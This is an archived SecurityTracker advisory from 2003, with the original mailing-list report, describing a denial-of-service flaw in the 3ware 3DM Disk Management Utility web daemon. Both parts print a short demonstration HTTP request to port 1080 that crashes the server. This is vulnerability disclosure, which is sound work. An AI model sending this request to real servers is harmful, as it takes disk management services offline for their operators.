SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   3DM Disk Management Utility Vendors:   3ware
3ware 3DM Disk Management Utility Web Daemon Bugs Let Remote Users Crash the Software
SecurityTracker Alert ID:  1006024
SecurityTracker URL:  http://securitytracker.com/id/1006024
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 30 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.13.00.019; Possibly others
Description:   A denial of service vulnerability was reported in the 3ware 3DM Disk Management Utility. A remote user can cause the server to crash.

It is reported that a remote user can connect to the 3DM web server on port 1080 and send bogus data in certain HTTP fields to cause the web server daemon to crash. A demonstration exploit is provided:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

It is also reported that a remote user can send cookies to the server to cause the server to crash. This can reportedly create operational difficulties if the site uses domain-wide cookies.

Another user (Jason Giglio) confirmed that conducting a Nessus scan against version 1.13.00.019 will cause the server to crash.

Impact:   A remote user can cause the web server process to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.3ware.com/products/raid_management.asp (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  3Ware 3DM denial of service attack


I've reported this to 3ware at least twice, and never received any
response. Previously I didn't have a test case other than "run a nessus
scan against the host". I've narrowed it down to a reproducible minimum
test case now.

If you connect to 3dm port 1080 on either linux or windows and send:

GET / HTTP/1.1
Host: foo
Accept-Charset: bar

3dm server will terminate immediately.


Other 3dm problems - it flips out and refuses to accept a login if you
have ANY cookies sent. This screws you over if you have a sitewide
.domain.edu cookie for example. 

-- Nathan

------------------------------------------------------------
Nathan Neulinger                       EMail:  nneul@umr.edu
University of Missouri - Rolla         Phone: (573) 341-4841
Computing Services                       Fax: (573) 341-4216

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC